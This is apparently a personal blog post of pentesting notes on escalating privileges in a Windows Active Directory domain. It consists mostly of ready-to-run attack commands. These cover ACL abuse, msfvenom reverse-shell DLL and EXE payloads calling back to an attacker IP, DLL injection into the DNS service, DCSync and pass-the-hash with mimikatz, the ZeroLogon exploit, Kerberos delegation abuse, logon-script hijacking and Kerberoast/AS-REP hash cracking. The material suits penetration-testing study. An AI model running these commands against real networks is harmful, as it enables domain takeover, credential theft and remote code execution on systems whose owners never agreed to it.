1525 words

8 minutes

Windows AD Domain Privilege Escalation

2025-02-14

Notes

/

AD

/

windows

ACL - GenericAll on Group#

ACL - GenericAll on Group - DNSAdmin#

1
Get-DomainGroup -SamAccountName * -ResolveGUIDS | ? {($_.ActiveDirectoryRights -match 'GenericAll')}
2

3
Get-DomainGroup -SamAccountName * | ? {($_.ActiveDirectoryRights -match 'GenericAll') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}
4

5
Get-DomainGroup -SamAccountName "DNSAdmins" | ? {($_.ActiveDirectoryRights -match 'GenericAll') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}

Add user to domain admins#

1
Add-DomainGroupMember -Identity 'DnsAdmins' -Members 'student1'
2

3
Get-DomainGroupMember -SamAccountName 'DnsAdmins'
4

5
Get-ObjectAcl -ResolveGUIDs | ? {($_.objectdn -eq "CN=DNSAdmins,CN=Users,DC=pentesting,DC=local")}
6

7
Get-ObjectAcl -SamAccountName "DNSAdmins" -ResolveGUIDs

First of, let’s get its distinguishedName#

1
Get-DomainGroup -SamAccountName "DNSAdmins"
2

3
Get-ObjectAcl -ResolveGUIDs | ? {($_.objectdn -eq "CN=DNSAdmins,CN=Users,DC=pentesting,DC=local") -and ($_.ActiveDirectoryRights -match 'GenericAll')}
4

5
Get-ObjectAcl -ResolveGUIDs | ? {($_.objectdn -eq "CN=DNSAdmins,CN=Users,DC=pentesting,DC=local") -and ($_.ActiveDirectoryRights -match 'GenericAll') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}

Add user to domain admins#

1
Add-DomainGroupMember -Identity 'DnsAdmins' -Members 'student1'
2

3
Get-DomainGroupMember -SamAccountName 'DnsAdmins'

Priv Esc- DNSAdmins#

Find the members in the DNSAdmin#

1
. .\powerview.ps1
2
Get-DomainGroup -SamAccountName "DNSAdmin"
3
Get-DomainGroupMember -Name "DNSAdmin"

In this method, we load an arbitrary DLL with SYSTEM privileges on the DNS server. i.e., We will build a DLL which contains reverse tcp code and inject it into dns.exe process on the #victim’s DNS Server (DC). In case your work requires building a DLL which exports all necessary functions refer this post or this screenshot for building the DLL instead of msfvenom. You #can also use remote dll injector.

Building the DLL using msfvenom:#

1
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f dll > privesc.dll

Python HTTP Server#

1
python -m http.server 80

Injecting the DLL in dns.exe#

C:\Windows\system32\dnscmd.exe

1
dnscmd testmachine.test.local /config /serverlevelplugindll \\192.168.43.100\share\privesc.dll

Normally we cannot check if the dll was added, as it requires Administrator privileges, but in our case we did have an admin account, so we can check using the following command, from DC

1
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

Start Listening#

1
. .\powercat.ps1
2
powercat -l -p 4444 -Verbose

For restarting the server#

1
sc.exe <FQDN of DC> stop dns
2
sc.exe <FQDN of DC> start dns

DCSync#

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.

To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.

The KRBTGT is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It’s created automatically when a new domain is created. It cannot be deleted. its name cannot be changed. it cannot be enabled.

KDC service handles all Kerberos ticket requests so KRBTGT account in AD plays a key role that encrypts and sign all Kerberos tickets for the domain.

1
Get-ForestGlobalCatalog
2
Get-DomainUser -Name student1
3

4
# Get the object ACL for the pentesting.local forest
5
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs
6

7
# Get the object ACL matching ObjectAceType = DS-Replication for the pentesting.local forest
8
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*')}
9

10
# Get the object ACL matching ObjectAceType = DS-Replication and SecurityIdentifier for my current user =  for the pentesting.local forest
11
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }
12

13
# Get the all the ACL in the pentesting.local forest for my current SecurityIdentifier
14
Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }
15

16
# dump the commands for administrator
17
import-module invoke-mimikatz
18
invoke-mimikatz -Command '"lsadump::dcsync /user:v.frizzle\administrator"'
19

20
# pass the hash to become the administrator
21
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:... /ntlm:... /run:powershell.exe"'
22

23
# see if we are administrator
24
invoke-command -ComputerName dc.pentesting.local -ScriptBlock{whoami;hostname}
25

26
# enter powershell session for the dc as the administrator
27
Enter-PSSession -ComputerName dc.pentesting.local
28
hostname
29
whoami

ZeroLogon CVE-2020-1472#

Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.

1
cd mimikatz-master\x64
2
# See if it is vulnerable
3
lsadump::zerologon /target:dc.pentesting.local /account:dc$
4

5
# Exploit it
6
lsadump::zerologon /target:dc.pentesting.local /account:dc$ /exploit
7

8
# dcsync
9
lsadump::dcsync /dc:dc.pentesting.local /authuser:dc$ /authdomain:exploit.local /authpassword:"" /authntlm /user:krbtgt
10

11
# Pass the hash
12
Invoke-Mimikatz -Command '"sekurlsa::pth /user:student5 /domain: /ntlm: /run:powershell.exe"'

/target is the full fqdn of the target dc
/account variable is the name of the dc followed by $

Unconstrained delegation#

1
powerhsell -ep bypass
2
import-module .\Powervien.ps1
3
Get-domainComputer -uncontrained
4

5
.\Rubeus.exe monitor /interval:1
6
# another PS
7
.\SpoolSample.exe dc.pnte.local studen.pente.local
8
.\Rubeus.exe ptt /ticket:dedede
9
.\Rubeus.exe triage
10
.\Rubeus.exe klist
11

12
import-module .\Invoke-Mimikatz.ps1
13
# then do dcsync attack
14
# pass the hash after getting the ntlm

Contrained delegation#

Kerberos constrained delegation was introduced in Windows Server 2003 to provide a safer form of delegation that could be used by services. When it is configured, constrained delegation restricts the services to which the specified server can act on the behalf of a user. This requires domain administrator privileges to configure a domain account for a service and is restricts the account to a single domain. In today’s enterprise, front-end services are not designed to be limited to integration with only services in their domain.

1
# Enumerate
2
Get-DomainComputer -TrustedToAuth
3

4
# u can find it in msds-allowedtodelegateto
5

6
. .\Invoke-Mimikatz.ps1
7
invoke-mimikatz
8
# STUDENT$ ntlm aa81bb97a48748ad89541137bf78001f
9

10
# ask dc for a tgt for the student server
11
# Download kekeo:
12
https://github.com/gentilkiwi/kekeo/releases
13
kekeo.exe
14
tgt::ask /user:student$ /domain:pentesting.local /rc4:aa81bb97a48748ad89541137bf78001f
15

16
# ask dc for a tgs for the student server
17
tgs::s4u /tgt:TGT_student$@PENTESTING.LOCAL_krbtgt~pentesting.local@PENTESTING.LOCAL.kirbi /user:Administrator@pentesting.local /service:time/ad.pentesting.local|ldap/ad.pentesting.local
18

19
# use the tgs and inject it
20
. ..\..\invoke-mimikatz.ps1
21
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@pentesting.local@PENTESTING.LOCAL_student$@PENTESTING.LOCAL.kirbi"'
22

23
# Dcsync to perform a goldent ticket attack
24
Invoke-Mimikatz -Command '"lsadump::dcsync /user:pentesting\krbtgt"'

ACL - GenericWrite on User#

WriteProperty on an ObjectType allow us to modify/overwrite the Script-Path, which means that the next time, when the user logs on, their system will execute our malicious script:

Enumerate to find all objects with GenericWrite#

1
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite')}

Enumerate to find all objects with GenericWrite and for my current username#

1
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}

Enumerate to find ippsec with GenericWrite and for my current username#

1
Get-ObjectAcl -SamAccountName "ippsec" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}

Building the EXE using msfvenom:#

1
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f exe > privesc.exe

create a shared folder and add it there and allow everyone to access it#

1
Get-DomainUser -Identity testuser -Properties scriptpath
2

3
$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
4

5
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
6

7
Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'}  -Credential $Cred -Verbose
8

9
Get-DomainUser -Identity testuser -Properties scriptpath

SET-SPN - Kerberoast#

look for account

generic write access
generic all access

then u can set the SPN

1
. .\Invoke-Kerberoast.ps1
2
invoke-kerberoast
3
# if didnt work look for account u have generic write on it
4
.\Powerview.ps1
5
Get-ObjectAcl -SamAcc...
6

7
Get-DomainUser -Identity hadams | selsct serviceprincipalname
8
Set-DomainObject -Identity hadams -Set @{serviceprincipalname='ops/whatever1'}
9
Get-DomainUser -Identity hadams | selsct serviceprincipalname
10

11
. .\Invoke-Kerberoast.ps1
12
invoke-kerberoast
13

14
# break it with hashcat
15
invoke-kerberoast  -OutputFormat Hashcat > hash.txt
16

17
. .\Powerview.ps1
18
Get-DomainUser -SamAccountName hadams
19
Get-DomainComputer

Targeted Kerberoasting - AS-REPs - FINDING#

The ASREPRoast attack looks for users without Kerberos pre-aut6hentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

1
# see if the account you disabled appears
2
Get-DomainUser -PreauthNotRequired -Verbose
3
.\ASREPRoast.ps1
4
Inovke-ASREPRoast -Verbose
5
# ---------------------Abuse it---------------
6
# Export hash
7
.\Rubeus.exe asreproast /format:hashcat /outfile:s4vitar.asreproast
8

9
# Using bleeding-jumbo branch of John The Ripper, we can brute-force the hashes offline.
10
./john s4vitar.asreproast --wordlist=rockyou.txt
11
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Targeted Kerberoasting - AS-REPs - SET#

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

1
# see if the account you disabled appears
2
Get-DomainUser -PreauthNotRequired -Verbose
3

4
# If you do not find anything, you can look if you can set the PreauthNotRequired with ACL  GenericAll or GenericWrite
5
# Import Module
6
. .\powerview.ps1
7

8
# Get your SID
9
whoami
10
Get-DomainUser -SamAccountName Student1
11

12
# GenericAll
13
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}
14

15
# GenericWrite
16
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603')}
17

18
# Disable the DoesnotRequirePreAuth for a user
19
Set-DomainObject -Identity hadams -XOR @{useraccountcontrol=4194304} –Verbose
20

21

22
# ---------------------Abuse it---------------
23
# Export Hashes
24
.\Rubeus.exe asreproast /format:hashcat /outfile:hadams.asreproast
25

26

27
# crack offline
28
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
29

30

31
# Set it back to normal
32
Set-DomainObject -Identity hadams -XOR @{useraccountcontrol=512} –Verbose
33

34
# Enter-PSSession

Windows AD Domain Privilege Escalation

https://zakariaf.vercel.app/posts/ad4/

Author

Zakaria Farahi

Published at

2025-02-14

License

CC BY-NC-SA 4.0

HackTheBox | Titanic

Windows AD Lateral Movement